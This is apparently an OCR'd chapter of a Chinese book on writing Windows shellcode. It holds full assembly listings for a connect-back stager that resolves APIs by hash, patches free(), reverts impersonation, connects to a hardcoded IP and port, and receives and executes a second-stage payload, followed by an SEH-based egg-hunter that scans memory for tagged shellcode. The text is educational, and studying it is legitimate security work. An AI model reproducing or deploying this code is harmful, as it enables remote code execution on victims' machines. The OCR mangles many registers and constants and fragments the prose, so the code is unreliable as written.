我 们 用 gcc 的 asm() 和 .set 语句 来 开始 shellcode 函 数 。 这 些 语句 不 生成 实际 代码 ,也 不 占用 程 
序 空间 ， 它 们 的 存在 ， 可 以 使 我 们 比较 方便 地 管理 shelicode 中 使 用 的 常量 的 存储 空间 。 

void 

getprocaddr () 

{ 


/*GLOBAL DEFINES*/ 
asm(" 


-Set KERNEL32HASH, 0x000d4e88 

-Set NUMBEROFKERNEL32FUNCTIONS, 0x4 

-Set VIRTUALPROTECTHASH, 0x38d13c 

.Set GETPROCADDRESSHASH, 0x00348bfa 

.Set LOADLIBRARYAHASH, 0x000d5786 

.Set GETSYSTEMDIRECTORYAHASH, Ox069bb2e6 


.Set WS232HASH, 0x0003ab08 
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.Set NUMBEROFWS232FUNCTIONS, 0x5 


.Set CONNECTHASH, 0x0000677c 
.Set RECVHASH, 0x00000cc0 
.set SENDHASH, 0x00000cd8 
.Set WSASTARTUPHASH, 0x00039314 
.Set SOCKETHASH, 0x000036a4 


.Set MSVCRTHASH, 0x00037908 
.Set NUMBEROFMSVCRTFUNCTIONS, 0x01 
.Set FREEHASH, 0x00000c4e 


.Set ADVAPI32HASH, 0x000ca608 
.Set NUMBEROFADVAPI32FUNCTIONS, 0x01 
.Set REVERTTOSELFHASH, OxO000dcdb4 


"); 

下 面 开 始 写 shellcode。 第 一 部 分 是 PIC (Position Independent Code， 位 置 无 关 性 代码 )。 首 先 
将 sebx 设 为 当前 的 位 置 。 设 置 完成 后 ， 所 有 的 局 部 变量 都 可 以 参考 sebx。 这 和 真正 的 编译 器 所 
做 的 工作 类 似 。 


/*START OF SHELLCODE*/ 
asm(" 


mainentrypoint: 
call geteip 
geteip: 

pop %ebx 


因为 现在 还 不 知道 esp 指 向 哪里 ， 为 了 避免 在 调用 函数 时 产生 错误 ， 需 要 先 把 它 规格 化 。 即 
使 是 在 getPc 代 码 里 ， 这 也 是 个 问题 ， 因 此 ， 为 了 使 $esp 指 向 你 的 破解 ， 你 可 能 想 在 shellcode 前 
部 包含 sub $50,%esp。 但 是 ， 如 果 你 占用 的 地 方太 大 〔 这 里 使 用 0x1000)， 在 试图 向 栈 写 数据 
时 ， 可 能 会 超出 范围 ， 导 致 访问 违例 。 当 然 ， 我 们 在 这 里 选择 的 是 合理 的 值 ， 在 绝 大 多 数 情况 下 
是 可 以 正常 工作 的 。 


movl %ebx, tesp 
subl $0x1000,%esp 


奇怪 的 是 ， 为 了 使 ws2_32 .dl11 里 的 一 些 函数 正常 工作 ，%esp 必 须 被 对 齐 〈 这 很 可 能 是 
ws2_32.dl11 的 漏洞 )。 我 们 这 样 做 : 

and $Oxffffff00,Sesp 

到 这 一 步 ， 就 可 以 着 手 填充 函数 表 了 。 首 先 要 在 kerne1l32 .dl11 里 找到 所 需 函 数 的 地 址 ， 
我 们 用 3 个 函数 完成 这 个 工作 。 先 把 ecx 设 置 为 散 列 列表 中 的 函数 个 数 ， 然 后 进入 循环 。 每 次 循 
环 时 ， 都 传递 getfuncaddress () 、kerne132.d11 (不 要 忘 了 .911) 的 散 列 值 及 所 需 函 数 
名 的 散 列 值 。 当 程序 返回 函数 地 址 后 ， 我 们 把 它 放 入 sedi 指 向 的 函数 表 中 。 注意 ， 这 种 方法 生 
成 的 地 址 格式 是 统一 的 .zaBEL-geteip (%ebx) 总 是 指向 LABEL, 这 样 一 来 , 你 就 可 以 用 LABEL 
访问 存储 的 变量 了 。 
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//set up the loop 

movl SNUMBEROFKERNEL32FUNCTIONS, $ecx 

lea KERNEL32HASHESTABLE-geteip (%ebx) , esi 
lea KERNEL32FUNCTIONSTABLE-geteip (%ebx) , tedi 


//ran the loop 

getkernel32functions: 

//push the hash we are looking for, which is pointed to by %esi 
pushl (%esi) 

pushl SKERNEL32HASH 

call getfuncaddress 

movl %eax, (%edi) 

addl $4, %edi 

addl $4, %esi 

loop getkernel32functions 


既然 有 了 由 .411 kerne132.dl11 的 函数 组 成 的 函数 表 ， 就 可 以 从 MsVcRT 找 到 所 需 的 函数 。 
注意 ， 这 里 也 是 用 循环 结构 处 理 的 。 这 里 调用 了 getfuncaddress() ， 我 们 下 次 遇 到 它 时 再 仔细 
研究 ， 现 在 假设 它 能 正常 工作 就 可 以 了 。 

//GET MSVCRT FUNCTIONS 

movl SNUMBEROFMSVCRTFUNCTIONS, tecx 

lea MSVCRTHASHESTABLE-geteip (%ebx) , esi 

lea MSVCRTFUNCTIONSTABLE-geteip (%ebx) , edi 

getmsvertfunctions: 

pushl (%esi) 

pushl $MSVCRTHASH 

call getfuncaddress 

movl %teax, (edi) 

addl $4, %edi 


addl $4, $esi 
loop getmsvcrtfunctions 


在 堆 溢 出 过 程 中 ,利用 代码 为 了 获得 控制 权 会 破坏 堆 。 但 如 果 你 不 是 操作 堆 的 唯一 线程 ， 当 
.在 堆 上 分 配 空间 的 其 他 线程 试图 调用 free () 时 ， 可 能 会 出 麻烦 。 为 了 防止 这 种 情况 发 生 ， 我 们 
可 以 用 操作 码 0xc3 替 换 free() 的 函数 prelude， 使 tree () 在 不 访问 堆 的 情况 下 正常 返回 。 

要 达到 上 述 目 的 ， 我 们 需要 修改 free() 所 在 页 的 保护 模式 。 和 其 他 包含 可 执 代码 的 内 存 页 
一 样 ，free() 所 在 的 内 存 页 被 标记 为 只 读 和 执行 ， 因 此 ， 必 须 把 它 的 属性 改 成 +zwx， 利 用 
virtualprotect 函 数 做 这 件 事 。Virtualprotect 函 数 在 MsVcRT 之 中 ， 但 因为 在 前 面 已 经 把 
MSVCRT 的 函数 填 入 函数 表 了 ， 所 以 Virtualprotect 函 数 应 该 在 我 们 的 函数 表 中 。 我 们 在 自己 的 
内 部 数据 结构 中 临时 存储 指向 free() 的 指针 〈 绝 不 要 同时 重 设 页 面 的 权限 )。 


//QUICKLY! 
//VIRTUALPROTECT FREE +rwx 
lea BUF-geteip(%ebx) , teax 
pushl %teax 

pushl $0x40 

pushl $50 
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movl FREE-geteip (各 ebx) , sedx 
pushl %edx 

call *VIRTUALPROTECT-geteip (%tebx) 
//restore edx as FREE 

movl FREE-geteip(%ebx) , tedx 
//overwrite it with return! 

movi $0xc3c3c3c3, (%edx) 

//we leave it +rwx 


修改 相关 代码 ， 使 free() 在 不 访问 堆 的 情况 下 返回 正常 。 这 就 能 在 控制 程序 中 防止 其 他 线 
程 引起 访问 违例 。 

shellcode 尾 部 是 字符 串 ws2_32.d11。 我 们 想 加 载 它 〈 此 时 ， 它 还 没有 被 加 载 ) 并 对 它 初 始 
化 ， 然 后 利用 它 连 向 已 在 监听 TCP 端 口 的 主机 。 不 幸 的 是 ， 我 们 在 此 碰 到 了 一 些 麻烦 ， 在 某 些 破 
解 〈 如 RPC LOCATOR) 里 ， 在 调用 Revertroself () 前 并 不 能 加 载 ws2_32 .dl11， 因 为 你 所 在 的 定 
位 器 线程 只 能 暂时 模拟 匿名 用 户 处 理 你 的 请 求 ， 而 匿名 用 户 是 没有 权限 读 任何 文件 的 。 因 此 , 我 
们 只 能 假设 ApVaPIT.dal1I 已 被 加 载 ， 然 后 利用 它 寻 找 RevertToself。 不 加 载 ApvaPT.dl11 的 情况 
很 少见 ， 假 如 不 幸 被 你 遇 到 了 ， 将 导致 这 部 分 shellcode 贿 演 。 当 然 ， 你 可 以 事先 做 一 下 检查 ， 确 
保 在 RevertToself 的 指针 不 为 0 时 调用 它 。 我 们 在 这 里 没有 做 检查 ， 因 为 这 只 会 增加 shellcode 的 
长 度 而 对 我 们 并 没有 太 大 的 帮助 。 

//Now, we call the RevertToSelf() function so we can actually do 

some//thing on the machine 

//You can't read ws2_32.dll in the locator exploit without this. 

movi $NUMBEROFADVAPI32FUNCTIONS, %ecx 


lea ADVAPI32HASHESTABLE-geteip (%ebx) , tesi 
lea ADVAPI32FUNCTIONSTABLE-geteip ($ebx) , edi 


getadvapi32functions: 
pushl (%esi) 

pushl SADVAPI32HASH 

call getfuncaddress 

movl %eax, (Sedi) 

addl $4,%esi 

addl $4,%edi 

loop getadvapi32functions 


call *REVERTTOSELF-geteip (%ebx) 

现在 ， 我们 以 进程 属 主 的 身份 运行 ， 也 有 权限 读 ws2_32 .911。 但 在 某 些 Windows 系 统 上 ， 
如 果 没 有 指定 完整 的 路 径 ，Loadripbrary&a() 会 因 路 径 中 存在 点 号 〈.) 而 找 不 到 ws2_32.dl1。 
这 意味 着 还 必须 先 调用 GetsystemDpirectoryA() 处 理 ws2_32.dl1 字 符 串 。 我 们 在 shellcode 尾 部 
的 临时 缓冲 区 (Bur) 里 进行 这 些 操作 。 

//call getsystemdirectoryA, then prepend to ws2 32.dll 

pushl $2048 


lea BUF-geteip($ebx),£$eax 
pushl %eax 
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call *GETSYSTEMDIRECTORYA-geteip (%ebx) 

//ok, now buf is loaded with the current working system directory 
//we now need to append \\WS2_32.d1l to that, because of a bug in LoadLibraryA, 
//which won't find WS2 32.dll if there is a dot in that path 

lea BUF-geteip($ebx),$eax 

findendofsystemroot: 

cmpb $0, (%eax) 

je foundendofsystemroot 

inc %eax 

jmp findendofsystemroot 

foundendofsystemroot: 

//eax is now pointing to the final null of C:\\windows\\system32 
lea WS2_32DLL-geteip (%ebx) , esi 

strcpyintobuf: 

movb (%esi), %dl 

movb %dl, (%eax) 


test $dl,*dl 
jz donewithstrcpy 


inc $esi 

inc $eax 

jmp strepyintobuf 
donewithstrcpy: 


//loadlibrarya(\"c:\\winnt\\system32\\ws2_32.d11\"); 
lea BUF-geteip(%tebx) , tedx 

pushl %edx 

call *LOADLIBRARY-geteip (%ebx) 


到 这 一 步 ， 我 们 知道 ws2_32 .dl11 已 经 被 加 载 ， 当 需要 建立 连接 时 ， 就 可 以 从 中 加 载 函数 了 。 


movl SNUMBEROFWS232FUNCTIONS, %ecx 
lea WS232HASHESTABLE-geteip (%ebx) , esi 
lea WS232FUNCTIONSTABLE-geteip (%ebx) , tedi 


getws232functions: 

//get getprocaddress 
//hash of getprocaddress 
pushl (%esi) 

//push hash of KERNEL32.d11 
pushl $WS232HASH 

call getfuncaddress 

movl $eax, (Sedi) 

addl $4, $esi 

addl $4, $edi 

loop getws232functions 


//ok, now we set up BUFADDR on a quadword boundary 

//esp will do since it points far above our current position 
movl %esp, BUFADDR-geteip (%ebx) 

//done setting up BUFADDR 
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当然 ， 必 须 调 用 wsasTARmUP 得 到 ws2_32 .dl11 回 转 区 。 如 果 ws2_32.dl11 已 经 被 初始 化 ， 再 
次 调用 wsasTaRTUP 也 不 会 带 来 任何 危害 。 


movl BUFADDR-geteip(%ebx), $eax 
pushl %eax 

pushl $0x101 

call *WSASTARTUP-geteip (%ebx) 


//call socket 

pushl $6 

pushi $1 

pushl $2 

call *SOCKET-geteip (%ebx) 
movl %eax, FDSPOT-geteip (%ebx) 


现在 调用 connect () 函数 ， 它 将 使 用 保存 在 shellcode 尾 部 的 、 硬 编码 过 的 IP 地 址 。 在 实际 
使 用 时 ， 你 应 该 把 它 换 成 你 指定 的 IP 地 址 和 端口 。 如 果 调 用 connect () 失败 ， 程 序 将 跳 到 
exitthread，3 引 起 异常 并 月 江 。 有 时 需要 调用 ExitProcess ()， 有 了 时 会 为 了 处 理 进程 而 引起 
异常 。 

//call connect 

//push addrlen=16 

push $0x10 

lea SockAddrSPOT-geteip(%ebx) ,%esi 

//the 4444 is our port 

pushl %esi 

//push fd 

pushl %eax 

call *CONNECT-geteip (%ebx} 

test Sean, eax 

jl exitthread 


到 这 里 ， 对 第 一 部 分 shellcode 的 分 析 结 束 了 ， 我 们 接 下 来 分 析 保 存在 远程 服务 器 上 的 后 续 的 
shellcode. 


pushl $4 

call recvloop 

//ok, now the size is the first word in BUF 
//Now that we have the size, we read in that much shellcode into the buffer. 
movl BUFADDR-geteip (%ebx) , tedx 

movl (%tedx) , tedx 

//now edx has the size 

push %edx 

//read the data into BUF 

call recvloop 

//Now we just execute it. 

movl BUFADDR-getein (%ebx) , tedx 

call *%edx 


至 此 ， 我 们 把 控制 权 正 式 交 给 了 后 续 的 shellcode。 在 一 般 情况 下 ， 后 续 shellcode 首 先 会 重复 





108 # 7% Windows shellcode 





前 面 做 过 的 大 部 分 工作 。 

看 过 shellcode 的 概貌 后 ,我 们 再 来 重点 看 一 下 shellcode 中 用 到 的 一 些 函 数 。 下面 是 recvloop 
函数 的 代码 ， 它 接受 调用 者 传递 的 参数 的 大 小 ， 并 用 一 部 分 “全 局 ”变量 控制 读 入 的 数据 放 至 哪 
里 。 就 像 connect () 函数 那样 ， 如 果 recvloop 发 现 错误 也 会 跳 到 exitthread。 


//recvloop function 
asm(" 
//START FUNCTION RECVLOOP 
//arguments: size to be read 
//reads into *BUFADDR 
recvloop: 
pushl $ebp 
movl %esp, tebp 
push %edx 
push %edi 
//get argl into edx 
movl 0x8($ebp), %edx 
movi BUFADDR-geteip (*ebx) , edi 


callrecvloop: 

//not an argument- but recv() messes up edx! So we save it off here 
pushl %edx 

//flags 

pushi $0 

//len 

pushl $1 

/ / *bu£ 

pushl £&edi 

movi FDSPOT-geteip($£ebx),&eax 

pushl $eax 

Call *RECV-geteip($ebx) 

//prevents getting stuck in an endless loop if the server closes the connection 
emp SOxffffffff,€teax 

je exitthread 


popl %edx 


//subtract how many we read 

sub Jeax, tedx 

//move buffer pointer forward 

add teax, tedi 

//test if we need to exit the function 
//recv returned 0 

test %teax, teax 

je donewithrecvloop 

//we read all the data we wanted to read 
test %edx, tedx 


je donewithrecvloop 
jmp callrecvloop 


donewithrecvloop: 
//done with recvloop 
pop $edi 

pop $edx 

mov $ebp, $esp 

pop %ebp 

ret $0x04 

//END FUNCTION 


接 下 来 是 前 面 提 到 过 的 getfuncaddress ()， 它 根据 DLL 和 函数 名 的 散 列 值 找 出 函数 指针 
的 地 址 。 因 为 做 了 很 多 工作 但 都 不 符合 常规 ， 所 以 它 可 能 是 shellcode 中 最 容易 让 人 不 解 的 函数 
了 。 它 依赖 于 fs:[0x30] ， 因 为 Windows 程 序 在 运行 时 ，fs:[0x30] 指向 PEB， 我 们 根据 
fs:[0x30] 可 以 找到 已 载 入 内 存 的 所 有 模块 。 然 后 ， 通 过 比较 每 个 模块 的 散 列 值 来 寻找 
kernel32.d11.d11。 散 列 函数 有 一 个 简单 的 标记 ， 用 来 区 分 对 象 是 Unicode 还 是 纯 ASCII 字 
FF FB 

当然 ， 也 可 以 选用 其 他 的 方法 ， 而 且 有 的 还 很 精练 。 例 如 ，Dafydd Stuttard 的 代码 使 用 8 
位 散 列 值 来 节省 空间 ， 也 有 一 些 方法 通过 分 析 PE 头 部 寻找 所 需 的 指针 。 其 实 不 必 通 过 分 析 PE 
头 部 来 获取 每 一 个 函数 的 指针 ， 只 需 找到 GetProcaddaress ()， 通 过 它 就 可 以 找到 其 他 的 函 
数 指针 了 。 


/* fs[0x30] is pointer to PEB 
*that + Oc is _PEB_LDR_DATA pointer 
*that + Oc is in load order module list pointer 


可 以 从 下 面 的 网 址 获取 更 多 信息 : 

ü http://www.builder.cz/art/asembler/anti_procdump.html 
D http://www.hick.org/code/skape/papers/win32-shellcode.pdf 
通常 ， 按 如 下 步骤 操作 。 

(1) 从 当前 的 模块 〈fs:0x30) 得 到 PE 头 部 。 

(2) 转 到 PE 头 部 。 

(3) 转 到 导出 表 ， 得 到 nBase 值 。 

(4) 得 到 arrayofNames， 寻 找 需 要 的 函数 。 

*/ 

//void* GETFUNCADDRESS( int hashl,int hash2) 
/*START OF CODE THAT GETS THE ADDRESSES*/ 
//arguments 


//hash of dll 
//hash of function 


110 第 7 章 Windows shellcode 


//returns function address 
getfuncaddress: 

pushl %ebp 

movl %esp, tebp 

pushl %ebx 

pushl %esi 

pushl %edi 

pushl %ecx 


pushl %fs: (0x30) 

popl $eax 

//test teax, teax 

//JS WIN9X 

NT: 

//get |PEB LDR DATA ptr 

movi O0xc($eax),$eax 

//get first module pointer list 
movl Oxc(%eax) , ¥ecx 


nextinlist: 

//next in the list into %tedx 

movl (%ecx) , tedx 

//this is the unicode name of our module 
movl 0x30 (%ecx) , eax 

//compare the unicode string at %eax to our string 
//if it matches KERNEL32.d11, then we have our module address at 0x18+%ecx 
//call hash match 

//push unicode increment value 

pushl $2 

//push hash 

movl 8(%ebp) , edi 

pushl %edi 

//push string address 

pushl $eax 

call hashit 

test %eax, teax 

jz  foundmodule 

//otherwise check the next node in the list 
movl %edx, %ecx 

jmp nextinlist 


//FOUND THE MODULE, GET THE PROCEDURE 

foundmodule: 

//we are pointing to the winning list entry with ecx 
//get the base address 

movl 0x18 (%ecx) , eax 
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//we want to save this off since this is our base that we will have to add 
push $eax 

//ok, we are now pointing at the start of the module (the MZ for 
//the dos header IMAGE DOS HEADER.e lfanew is what we want 

//to go parse (the PE header itself) 

movi 0Ox3c(€eax),$ebx 

addl $ebx,%eax 

//%ebx is now pointing to the PE header (ascii PE) 

//PE->export table is what we want 

//0x150-0xd8z0x78 according to OllyDbg 

movl 0x78 (%eax) , tebx 

//eax is now the base again! 

pop $eax 

push $eax 

addl %eax, %ebx 

//this eax is now the Export Directory Table 

//From MS PE-COFF table, 6.3.1 (search for pecoff at MS Site to 


download) . 
//Offset Size Field Description 

//16 4 Ordinal Base (usually set to one!) 

//24 4 Number of Name pointers (also the number of ordinals) 
//28 4 Export Address Table RVA Address EAT relative to base 
//32 4 Name Pointer Table RVA Addresses (RVA's) of Names! 
//36 4 Ordinal Table RVA You need the ordinals to get 








the addresses 


//theoretically we need to subtract the ordinal base, but it turns out 
they don't actually use it 

//movl 16 (%ebx) , ¥edi 

//edi is now the ordinal base! 

movl 28 (%ebx) , %ecx 

//ecx is now the address table 

movl 32($&ebx),$edx 

//edx is the name pointer table 

movi 36(%ebx) , ebx 

//ebx is the ordinal table 


//eax is now the base address again 
//correct those RVA's into actual addresses 
addl %teax, tecx 

addl $eax,£edx 

addl %eax, tebx 


//HERE IS WHERE WE FIND THE FUNCTION POINTER ITSELF Md 


find procedure: 
//for each pointer in the name pointer table, match against our hash 
//if the hash matches, then we go into the address table and get the 


//address using the ordinal table 
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movl ($edx),$esi 

pop $eax 

pushl $eax 

addl %eax,%esi 

//push the hash increment - we are ascii 
pushl $1 

//push the function hash 

pushl 12(%ebp) 

//esi has the address of our actual string 
pushl $esi 

call hashit 

test %eax, $eax 

jz found procedure 

//increment our pointer into the name table 
add $4,edx 

//increment out pointer into the ordinal table 
//ordinals are only 16 bits 

add $2,%ebx 

jmp find procedure 


found, procedure: 

//set eax to the base address again 

pop $eax 

xor %edx, tedx 

//get the ordinal into dx 
//ordinal=ExportOrdinalTable[i] (pointed to by ebx) 

mov (%ebx) , dx 

//SymbolRVA = ExportAddressTable[ordinal-OrdinalBase] 
//see note above for lack of ordinal base use 

//subtract ordinal base 

//sub tedi, $edx 

//multiply that by sizeof (dword) 

shl $2,%edx 

//add that to the export address table (dereference in above .c statement) 
//to get the RVA of the actual address 

add %edx, tecx 

//now add that to the base and we get our actual address 
add (%ecx) , eax 

//done eax has the address! 


popl %ecx 

popl %edi 

popl %esi 

popl %ebx 

mov %ebp, tesp . 
pop $ebp 

ret $8 


下 面 是 我 们 使 用 的 散 列 函数 。 它 对 字符 串 做 简单 的 处 理 ， 并 忽略 大 小 写 。 
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//hashit function 

//takes 3 args 

//increment for unicode/ascii 
//hash to test against 
//address of string 

hashit: 

pushl $ebp 

movl %esp, tebp 


push %ecx 
push %ebx 
push %edx 


xor %ecx, $ecx 
xor %ebx, tebx 
xor tedx, tedx 


mov 8(%ebp) , teax 

hashloop: 

movb (%eax) , dl 

//convert char to upper case 
or $0x60,%d1 

add %edx, tebx 

shl $1,%ebx 

//add increment to the pointer 
//2 for unicode, 1 for ascii 
addl 16(%ebp) , eax 

mov ($eax),$cl 

test %cl,%cl 

loopnz hashloop 





xor $eax,$eax 
mov 12($ebp),$ecx 
cmp %ecx, tebx 

jz donehash 
//failed to match, set eax==1 
inc $eax 
donehash: 

pop $&edx 

pop $ebx 

pop $ecx 

mov %ebp, %$esp 

pop %ebp 

ret $12 


下 面 这 段 代码 是 用 C 语 言 写 的 散 列 程序 ， 其 作用 和 上 面 的 代码 类 似 。 需 要 进行 散 列 处 理 的 
shellcode 可 能 会 用 到 不 同 的 散 列 函数 。 虽 然 所 有 散 列 函数 都 可 以 工作 ， 但 我 们 在 这 里 选择 的 是 一 
个 体积 较 小 、 容 易 用 汇编 语言 实现 的 散 列 函数 。 


#include <stdio.h> 
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main(int argc, char **argv) 
{ 

char * p; 

unsigned int hash; 


if (arge<2) 


printf ("Usage: hash.exe kernel32.dll\n"); 
exit (0); 
H 


peargv[1]; 


hash=0; 
while (*p!=0) 
{ 
//toupper the character 
hash-hash + (*(unsigned char * )p | 0x60); 
pt+; 
hash=hash << 1; 


} 
printf("Hash: 0x%8.8x\n",hash); 


} 

如 果 需 要 调用 ExitThread () 或 ExitProcess ()， 可 以 用 其 他 函数 蔡 换 下 面 的 结束 函数 。 不 
过 在 一 般 情况 下 ， 下 面 的 代码 就 足够 用 了 。 

exitthread: 

//just cause an exception 


xor %eax, teax 
call *$eax 


接 下 来 的 是 一 些 与 实际 情况 相关 的 数据 。 要 使 用 这 个 代码 ， 必 须 用 实际 的 地 址 和 端口 替换 下 
面 的 sockaddr 数 据 。 


SockAddrSPOT: 

//first 2 bytes are the PORT (then AF INET is 0002) 

.long 0x44440002 

//server ip 651a8c0 is 192.168.1.101 

.long 0x6501a8c0 ` 


KERNEL32HASHESTABLE: 
.long GETSYSTEMDIRECTORYAHASH 


.long VIRTUALPROTECTHASH 
.long GETPROCADDRESSHASH 
.long LOADLIBRARYAHASH 


MSVCRTHASHESTABLE: 
. long FREEHASH 


ADVAPI32HASHESTABLE: 


.long REVERTTOSELFHASH 


WS232HASHESTABLE: 
.long CONNECTHASH 
-long RECVHASH 

-long SENDHASH 

.long WSASTARTUPHASH 
.long SOCKETHASH 





WS2, 32DLL: 
„ascii \"ws2_32.dl1\" 
.long 0x00000000 


endsploit: 
//nothing below this line is actually included in the shellcode, but it 
//is used for scratch space when the exploit is running. 


MSVCRTFUNCTIONSTABLE: 
FREE: 
.long 0x00000000 


KERNEL32FUNCTIONSTABLE: 
VIRTUALPROTECT: 
.long 0x00000000 
GETPROCADDRA: 
.long 0x00000000 
LOADLIBRARY: 
.long 0x00000000 
//end of kernel32.dll functions table 





//this stores the address of buf+8 mod 8, since we are not guaranteed to be 
//on a word boundary, and we want to be so Win32 api works 


BUFADDR: 
.long 0x00000000 


WS232FUNCTIONSTABLE: 
CONNECT: 

.long 0x00000000 
RECV: 

.long 0x00000000 
SEND: 

.long 0x00000000 
WSASTARTUP: 

.long 0x00000000 
SOCKET: 

.long 0x00000000 
//end of ws2_32.dll functions table 


116 $73 Windows shellcode 


SIZE: 

.long 0x00000000 
FDSPOT: 

.long 0x00000000 
BUF: 


.long 0x00000000 
"); 


) 
我 们 的 主 程序 将 在 需要 时 输出 shellcode， 或 者 为 了 测试 而 调用 它 。 
int 


main() 


{ 
unsigned char buffer[4000]; 


unsigned char * p; 
int i; 
char *mbuf, *mbuf2; 
int error=0; 
//getprocaddr (); 
memcpy (buffer, getprocaddr, 2400) ; 
p=buffer; 
p*-3; /*skip prelude of function*/ 
//#define DOPRINT 
#ifdef DOPRINT 
/*gdb ) printf "%d\n", endsploit - mainentrypoint -1 */ 
printf("N""); 
for (i=0; i«666; i++) 
{ 
printf ("\\x%2.2x",*p); 
if ((i+1)%8==0) 
printf ("\"\nshellcodet+=\""); 
ptt; 
} 
printf ("\"\n"); 


dendif 
#define DOCALL 


#ifdef DOCALL 
((void(*) 0) (p)) O; 
#endif 


7.3 利用 Windows 异常 处 理 进行 搜索 
刚才 讨论 的 shellcode 比 预想 中 的 要 大 。 为 了 解决 这 个 问题 ， 再 写 一 个 可 以 搜索 内 存 并 找到 第 
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一 段 shellcode 的 shellcode。 下 面 是 执行 步骤 。 

(1) 脆弱 的 程序 正常 执行 。 

(2) 注入 用 于 搜索 的 shellcode。 

(3) 执行 第 一 段 shellcode。 

(4) 下 载 并 执行 后 续 的 shellcode。 

对 Windows shellcode 来 说 ， 搜 索 代 码 可 以 很 小 。 在 编码 之 后 译 码 之 前 ， 它 的 长 度 可 以 控制 在 
150B 之 内 , 基本 上 可 用 于 任何 情形 。 如 果 需 要 更 小 的 shellcode, 可 以 使 shellcode 依 赖 于 具体 的 SP， 
同时 硬 编码 函数 地 址 。 

shellcode 可 以 位 于 内 存 的 任何 位 置 ， 为 了 便于 寻找 shellcode， 需 要 在 shellcode 的 头 尾 各 加 一 
个 8B 的 标记 。 


#include <stdio.h> 

/[* 
* Released under the GPL V 2.0 
* Copyright Immunity, Inc. 2002-2003 


* 


Works under SE handling. 


Put location of structure in fs:0 
Put structure on stack 
when called you can pop 4 arguments from the stack 
.except handler( 
struct EXCEPTION RECORD *ExceptionRecord, 
void * EstablisherFrame, 
struct CONTEXT *ContextRecord, 
void * DispatcherContext ); 
typedef struct | CONTEXT 
t 





DWORD ContextFlags; 


DWORD Dr0; 
DWORD Dri; 
DWORD Dr2; 
DWORD Dr3; 
DWORD Dr6; 
DWORD Dr7; 
FLOATING SAVE AREA FloatSave; 
DWORD SegGs; 
DWORD SegFs; 
DWORD SegEs; 
DWORD SegDs; 
DWORD Edi; 
DWORD Esi; 
DWORD Ebx; 
DWORD Edx; 
DWORD ECX; 
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DWORD Fax; 
DWORD Ebp; 
DWORD Eip; 
DWORD SegCs; 
DWORD EFlags; 
DWORD Esp; 
DWORD SegSs; 
} CONTEXT; 


在 异常 发 生 后 返回 0， 然 后 继续 执行 。 














注解 当 反 向 搜索 TAG1 和 TAG2 时 ， 将 不 会 正确 匹配 shellcode， 而 且 还 可 能 会 破坏 shellcode。 








要 重点 注意 的 是 ， 异 常 处 理 结构 (-1, address) 必须 在 当前 线程 的 栈 上 。 如 果 曾 经 修改 过 
ESP， 那 么 在 这 里 ， 需 要 调整 线程 信息 块 里 当前 线程 的 栈 。 另 外 ， 还 需要 仔细 处 理 讨厌 的 对 齐 
(alignment) 问题 。 这 些 因素 综合 起 来 ， 又 会 使 shellcode 的 长 度 增加 一 些 。 比 较 好 的 策略 是 将 PEB 


与 RLLEnterCcriticlesection 绑 定 在 一 起 ， 如 下 所 示 ; 


k-z0Ox7ffdf020; 
*(int *)k-RtlEnterCriticalSectionadd; 


* */ 


#define DOPRINT 
//#define DORUN 
void 
Shellcode() 

{ 


/*GLOBAL DEFINES*/ 
asm(" 


.Set KERNEL32HASH, 0x000d4e88 


"): 


/*START OF SHELLCODE*/ 
asmí" 


mainentrypoint: 

//time to fill our function pointer table 

sub $0x50,%esp 

call geteip 

geteip: 

pop $ebx 

//ebx now has our base! 

//remove any chance of esp being below us, and thereby 
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//having WSASocket or other functions use us as their stack 
//which sucks 

movl %ebx, esp 

subl $0x1000,%esp 

//esp must be aligned for win32 functions to not crash 

and $Oxffffff00, esp 


takeexceptionhandler: 

//this code gets control of the exception handler 

//load the address of our exception registration block into fs:0 
lea exceptionhandler-geteip(%ebx) , teax 


//push the address of our exception handler 
push %eax 

//we are the last handler, so we push -1 
push $-1 

//move it all into place... 

mov tesp, fs: (0) 


//Now we have to adjust our thread information. block to reflect we may 

be anywhere in memory 

//As of Windows XP SP1, you cannot have your exception handler itself on 

//the stack - but most versions of windows check to make sure your 
//exception block is on the stack. 

addl $0xc, %esp 

movl tesp,%fs: (4) 

subl $0xc, tesp 

//now we fix the bottom of thread stack to be right after our SEH block 


movl %esp,%fs: (8) 


")e 


//search loop 
asm(" 
startloop: 
xor %esi, tesi 
mov TAG1-geteip(%ebx) , tedx 
mov TAG2-geteip (和 ebx) , tecx 


memcmp: 
//may fault and call our exception handler 
mov ($esi),£eax 

emp %teax, tecx 

jne addaddr 

mov 4(%esi), *eax 

cmp %eax, tedx 

jne addaddr 

jmp foundtags 
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addaddr: 
inc $esi 
jmp memcmp 


foundtags: 

lea 8($esi),$eax 

xor $esi,$esi 

//clear the exception handler so we don't worry about that on exit 
mov %esi,%fs: (0) 

call *%eax 

“j; 


asm(" 
//handles the exceptions as we walk through memory 
exceptionhandler: 
//int $3 
mov Oxc(%esp), %eax 
//get saved ESI from exception frame into %eax 
add $0xa0, %teax 
mov (%eax) , tedi 
//add 0x1000 to saved ESI and store it back 
add $0x1000, %edi 
mov %edi, (%eax) 
xor %eax, teax 
ret 


"): 
asm(" 
endsploit: 

//these tags mark the start of our real shellcode 
TAGS: 
TAG1: 

.long 0x41424344 
TAG2: 

.long 0x45464748 


CURRENTPLACE: 

//where we are currently looking 
. long 0x00000000 

")i 


} 


unsigned char buffer[4000]; 
unsigned char * p; 
int i; 
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unsigned char stage2[500]; 
//setup stage2 for testing 
strcpy (stage2, "HGFE") ; 
strcat (stage2, "DCBA\xcc\xce\xce"); 


//getprocaddr(); 
memcpy (buffer, shellcode, 2400); 
p=buffer; 
#ifdef WIN32 
pt=3; /*skip prelude of function*/ 
#endif 


#ifdef DOPRINT 
#define SIZE 127 
printf ("#Size in bytes: %d\n",SIZE); 
/*gdb ) printf "S$d\n", endsploit - mainentrypoint -1 */ 
printf ("searchshellcode+=\""); 
for (i20; i<SIZE; i++) 
{ 
printf ("\\x%2.2x",*p); 
if ((i+1)%8==0) 
printf ("\"\nsearchshellcode+=\""); 
ptt; 





} 
printf ("\"\n"); 


#endif 

#ifdef DORUN 
((void(*)())(p)) 0); 

#endif 


} 


7.4 弹出 shell 


在 Windows 里 ， 有 两 种 方法 可 以 从 套 接 字 得 到 shell。 在 UNIX 里 ， 可 以 用 aup2 O 复制 标准 IO 
的 文件 句柄 ， 然 后 执行 "/bin/sh" 即 可 。 但 在 Windows 里 没 这 么 简单 。 可 以 用 WsASocket () 代 替 
socket () 创建 一 个 套 接 字 ， 把 它 作 为 createProcess ("cmd.exe") 的 输入 。 然 而 ， 如 果 这 个 套 
